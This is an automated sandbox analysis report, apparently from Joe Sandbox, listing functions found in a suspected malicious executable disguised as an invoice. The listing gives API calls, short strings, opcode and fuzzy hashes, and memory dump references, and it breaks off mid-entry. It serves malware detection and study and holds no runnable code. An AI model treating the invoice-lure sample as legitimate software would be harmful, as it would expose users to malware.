                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: _wcscpy
                                                              • String ID: I/&$I/&
                                                              • API String ID: 3048848545-1687073061
                                                              • Opcode ID: 88dfdb524e9d45900ed7a20722aa58de949687d2b7979f4fca71de7ff0cb1198
                                                              • Instruction ID: 5fc78f07099be8b58bee61f2eeb7d86894371d842e031a89746829398eabd874
                                                              • Opcode Fuzzy Hash: 88dfdb524e9d45900ed7a20722aa58de949687d2b7979f4fca71de7ff0cb1198
                                                              • Instruction Fuzzy Hash: 70414CB1920217EBCF24DF88C451AFCB774EF18310F60405BE981A7191DB705EA6C7A0
                                                              Function 0020BCC9 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 143sleepCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • Sleep.KERNEL32(00000000), ref: 0020BCDA
                                                              • GlobalMemoryStatusEx.KERNEL32 ref: 0020BCF3
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: GlobalMemorySleepStatus
                                                              • String ID: @
                                                              • API String ID: 2783356886-2766056989
                                                              • Opcode ID: bf7d74d450f385140b7f0f26164f8fd1d0a48d4edcf548c2f0dc45ee8b85fa58
                                                              • Instruction ID: 0a60fa56773d87ec3cf622a597ce3461f390d9deedc075025e1d964359894839
                                                              • Opcode Fuzzy Hash: bf7d74d450f385140b7f0f26164f8fd1d0a48d4edcf548c2f0dc45ee8b85fa58
                                                              • Instruction Fuzzy Hash: 21512371418748DBE320AF14E88ABAFBBECFB95754F41484EF1C8410A2DF7095AC8B52
                                                              Function 0023C56D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 137COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 001F44ED: __fread_nolock.LIBCMT ref: 001F450B
                                                              • _wcscmp.LIBCMT ref: 0023C65D
                                                              • _wcscmp.LIBCMT ref: 0023C670
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: _wcscmp$__fread_nolock
                                                              • String ID: FILE
                                                              • API String ID: 4029003684-3121273764
                                                              • Opcode ID: 61028b2709e9850f82a285b31ff2ee1b61a72a8ebc453a5fc0db207eb67d4e7a
                                                              • Instruction ID: 5b08fc7380f494aa69c1c079d33fad2f70ae458dc34f5fc8d965a9dd0f49e255
                                                              • Opcode Fuzzy Hash: 61028b2709e9850f82a285b31ff2ee1b61a72a8ebc453a5fc0db207eb67d4e7a
                                                              • Instruction Fuzzy Hash: 7641C472A1420ABBDF21AFA4DC42FEF77B9AF89714F100069F605BB181D7719A148B51
                                                              Function 0025A76A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 96windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SendMessageW.USER32(?,00001132,00000000,?), ref: 0025A85A
                                                              • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0025A86F
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: MessageSend
                                                              • String ID: '
                                                              • API String ID: 3850602802-1997036262
                                                              • Opcode ID: fea8969c9723fc0c102bc329fc4932740b0a9266a3392450091c62c4e56ee272
                                                              • Instruction ID: d2a82dc10a23d60257baafd5140f7c97e3218e37c022c404062cf7241214bddb
                                                              • Opcode Fuzzy Hash: fea8969c9723fc0c102bc329fc4932740b0a9266a3392450091c62c4e56ee272
                                                              • Instruction Fuzzy Hash: DF41E774A1120A9FDB14CF68D885BEABBB9FF08301F14016AED05AB381D770A956CF95
                                                              Function 0025975A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • DestroyWindow.USER32(?,?,?,?), ref: 0025980E
                                                              • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 0025984A
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: Window$DestroyMove
                                                              • String ID: static
                                                              • API String ID: 2139405536-2160076837
                                                              • Opcode ID: 4f59807764fe5740af5bc196707713778aeb4772a0d320d6ba8819159837dc34
                                                              • Instruction ID: ae0208ef36e2b8e7c92f59cb787940378cf19116005ae708215ff668d4dda877
                                                              • Opcode Fuzzy Hash: 4f59807764fe5740af5bc196707713778aeb4772a0d320d6ba8819159837dc34
                                                              • Instruction Fuzzy Hash: 47316D71120605AEEB109F74DC84BBB73A9FF59761F00861AF8A9C7190CA31ACA5DB64
                                                              Function 00235157 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 87windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • _memset.LIBCMT ref: 002351C6
                                                              • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00235201
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: InfoItemMenu_memset
                                                              • String ID: 0
                                                              • API String ID: 2223754486-4108050209
                                                              • Opcode ID: 70a776343965fe3d06ce957097e61e9119f76f93d905bfe132bc2ca29ebd0e97
                                                              • Instruction ID: 2c380d95b2c423be5e776c365c59c96552f284a33dc0dfb47d11d9bf6d476b49
                                                              • Opcode Fuzzy Hash: 70a776343965fe3d06ce957097e61e9119f76f93d905bfe132bc2ca29ebd0e97
                                                              • Instruction Fuzzy Hash: B53134B1A203169BEB24CF89D845BAFBBF4FF41350F140419ED89A61A0E7B09A60CB10
                                                              Function 0024658B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 83COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: __snwprintf
                                                              • String ID: , $$AUTOITCALLVARIABLE%d
                                                              • API String ID: 2391506597-2584243854
                                                              • Opcode ID: 15408e63cdebacefafc6935bb8d8972ae4f7201101038f6b7728741aaa076c5f
                                                              • Instruction ID: 1d7a7ec7d3cd2268a13cc52f82ffca3228989670c3fd2a16f30c285e5f750e51
                                                              • Opcode Fuzzy Hash: 15408e63cdebacefafc6935bb8d8972ae4f7201101038f6b7728741aaa076c5f
                                                              • Instruction Fuzzy Hash: 38219131610118AFCF14EFA4C882EED77B9AF56740F010469F605AB181DB74EE65CBA6
                                                              Function 002593CF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0025945C
                                                              • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00259467
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: MessageSend
                                                              • String ID: Combobox
                                                              • API String ID: 3850602802-2096851135
                                                              • Opcode ID: 65881257cdbbde67844a3b64d939e5a190b96b9f997a60fe2726c97d56abfbdf
                                                              • Instruction ID: 568e2fc28fd671a7163fd8a14614e6f6c81f4df3ebfea6699e93647efe8d3327
                                                              • Opcode Fuzzy Hash: 65881257cdbbde67844a3b64d939e5a190b96b9f997a60fe2726c97d56abfbdf
                                                              • Instruction Fuzzy Hash: 8E11B271320209BFEF119F54DC80EBB376EEB893A5F104125FD189B290D6719CA68B64
                                                              Function 0025DA42 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 71COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 0020B34E: GetWindowLongW.USER32(?,000000EB), ref: 0020B35F
                                                              • GetActiveWindow.USER32 ref: 0025DA7B
                                                              • EnumChildWindows.USER32(?,0025D75F,00000000), ref: 0025DAF5
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: Window$ActiveChildEnumLongWindows
                                                              • String ID: T1$
                                                              • API String ID: 3814560230-1856683037
                                                              • Opcode ID: 94b738b2943dcc964a3d00ade7975be1ea2149b21a3d7e50e9abd97f3967a64d
                                                              • Instruction ID: 36c81ba69c4a0a7bf549263485be1ad5210aa275056f9c50937919f2753bcfc2
                                                              • Opcode Fuzzy Hash: 94b738b2943dcc964a3d00ade7975be1ea2149b21a3d7e50e9abd97f3967a64d
                                                              • Instruction Fuzzy Hash: CB213B35624201DFC724DF28E864AA677F9EF49321F650619E96A873E0D730A864CF64
                                                              Function 002598FE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 0020D17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0020D1BA
                                                                • Part of subcall function 0020D17C: GetStockObject.GDI32(00000011), ref: 0020D1CE
                                                                • Part of subcall function 0020D17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 0020D1D8
                                                              • GetWindowRect.USER32(00000000,?), ref: 00259968
                                                              • GetSysColor.USER32(00000012), ref: 00259982
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                              • String ID: static
                                                              • API String ID: 1983116058-2160076837
                                                              • Opcode ID: 8e3ce2b92f6080d18b5cd9d46cf3464d0c29ee1b3c4a97ffca282bc9db3cf180
                                                              • Instruction ID: 44031d0302336febff3c37eba3d7d38c760584e3ff4feead1858e87a2e0b3c22
                                                              • Opcode Fuzzy Hash: 8e3ce2b92f6080d18b5cd9d46cf3464d0c29ee1b3c4a97ffca282bc9db3cf180
                                                              • Instruction Fuzzy Hash: 0B11267252020AAFDB04DFB8DC45AEA7BB8FF08355F014628FD55E2250E734E864DB64
                                                              Function 00259617 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetWindowTextLengthW.USER32(00000000), ref: 00259699
                                                              • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 002596A8
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: LengthMessageSendTextWindow
                                                              • String ID: edit
                                                              • API String ID: 2978978980-2167791130
                                                              • Opcode ID: 0404a1e8b0c91267a2cd7d71fb2d6af966798c2a8e0cdb20d9450545863d9707
                                                              • Instruction ID: 7dbd69ab3872199f181d08f334a8c0ded74b323b761873782d3451267f734219
                                                              • Opcode Fuzzy Hash: 0404a1e8b0c91267a2cd7d71fb2d6af966798c2a8e0cdb20d9450545863d9707
                                                              • Instruction Fuzzy Hash: 70118B71120106EAEB105E64EC44AAB376EEB05369F504314FD25931E0C771DCA89B68
                                                              Function 00235262 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • _memset.LIBCMT ref: 002352D5
                                                              • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 002352F4
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: InfoItemMenu_memset
                                                              • String ID: 0
                                                              • API String ID: 2223754486-4108050209
                                                              • Opcode ID: dce179da04eac315d409ee7a20963db6f23a482aad4a19af11f807ab9d3a78f6
                                                              • Instruction ID: 7eaf3bb41d760c928f2ba6d9bc4cb1219c112ab97025807a1d43b530c6940e6b
                                                              • Opcode Fuzzy Hash: dce179da04eac315d409ee7a20963db6f23a482aad4a19af11f807ab9d3a78f6
                                                              • Instruction Fuzzy Hash: 0C11E6B1D21635ABDB10DF98D944B9E77B8AF05750F140155ED0AE7190D3B0ED24CB90
                                                              Function 00244D9F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 61networkCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00244DF5
                                                              • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00244E1E
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: Internet$OpenOption
                                                              • String ID: <local>
                                                              • API String ID: 942729171-4266983199
                                                              • Opcode ID: bd9904104af70e05bcefcf587b3dba0300c62ebf69d3d1151be32e161dbd583f
                                                              • Instruction ID: 7b10715a0120b40d8ff77abfa09b3302b2a3e0bb93c9e628df12ffd5e8aea191
                                                              • Opcode Fuzzy Hash: bd9904104af70e05bcefcf587b3dba0300c62ebf69d3d1151be32e161dbd583f
                                                              • Instruction Fuzzy Hash: 8511A070A21222FBDB2D9F51CC89FFBFAA8FF06755F10822AF50656140D3B059A0C6E0
                                                              Function 0021A70C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 002237A7
                                                              • ___raise_securityfailure.LIBCMT ref: 0022388E
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: FeaturePresentProcessor___raise_securityfailure
                                                              • String ID: (+
                                                              • API String ID: 3761405300-3490531655
                                                              • Opcode ID: 6bd03e6320d3d0a5dae9f1fae40aee9d25a09b6db66edcefd1b06f0519da6c51
                                                              • Instruction ID: 2d113fdf9ae4aad5f92a4bb895b109f3c78362213bec14f65c72c16e54bd32a9
                                                              • Opcode Fuzzy Hash: 6bd03e6320d3d0a5dae9f1fae40aee9d25a09b6db66edcefd1b06f0519da6c51
                                                              • Instruction Fuzzy Hash: 27211FB5511204DBD746DF65F9CAA427BB0FB4C310F109A2AE9088A3A0E3F4E990CF45
                                                              Function 0024A82C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 52networkCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 0024A84E
                                                              • htons.WSOCK32(00000000,?,00000000), ref: 0024A88B
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: htonsinet_addr
                                                              • String ID: 255.255.255.255
                                                              • API String ID: 3832099526-2422070025
                                                              • Opcode ID: 67fc48eeee5a5cf4ba5c2df2fe1511cb74ec43d2306c172e0b459a086b611b79
                                                              • Instruction ID: 3848c18b1f2bcfedd5415423b9731368201d57f34ea3a25940b36f6a6981bbde
                                                              • Opcode Fuzzy Hash: 67fc48eeee5a5cf4ba5c2df2fe1511cb74ec43d2306c172e0b459a086b611b79
                                                              • Instruction Fuzzy Hash: 8101F579250305ABCB19DF68D88AFADB368FF45310F208426F516AB3D1D771E821CB52
                                                              Function 0022B781 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 51windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 0022B7EF
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: MessageSend
                                                              • String ID: ComboBox$ListBox
                                                              • API String ID: 3850602802-1403004172
                                                              • Opcode ID: 5b9caa1de6e6614cbbfc74cb96f1cc7b571fff34aa3000a9a2c8c0ec7dd72c4c
                                                              • Instruction ID: 07f16c813c3c4911a76e947ff765e8c1ec181351ddcb292674fb51633cdbe408
                                                              • Opcode Fuzzy Hash: 5b9caa1de6e6614cbbfc74cb96f1cc7b571fff34aa3000a9a2c8c0ec7dd72c4c
                                                              • Instruction Fuzzy Hash: 4501247562012CBBCB05EFE4EC529FE7369BF56350B04061CF562A72C2EFB058289B90
                                                              Function 0022B67D Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SendMessageW.USER32(?,00000180,00000000,?), ref: 0022B6EB
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: MessageSend
                                                              • String ID: ComboBox$ListBox
                                                              • API String ID: 3850602802-1403004172
                                                              • Opcode ID: 37cb1d3ca52d95618ac3a6e7f56b1248d5f730b69fa07a6db820687e4291a23e
                                                              • Instruction ID: 7385ed6b44a0b2add73edefc341eaaa724e456c9607222bf7232601fcb985549
                                                              • Opcode Fuzzy Hash: 37cb1d3ca52d95618ac3a6e7f56b1248d5f730b69fa07a6db820687e4291a23e
                                                              • Instruction Fuzzy Hash: A7018FB5651019BBCB05EBA4EA52AFE73AC9F16344B100019B502B3292DF905E289BE5
                                                              Function 0022B700 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 48windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SendMessageW.USER32(?,00000182,?,00000000), ref: 0022B76C
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
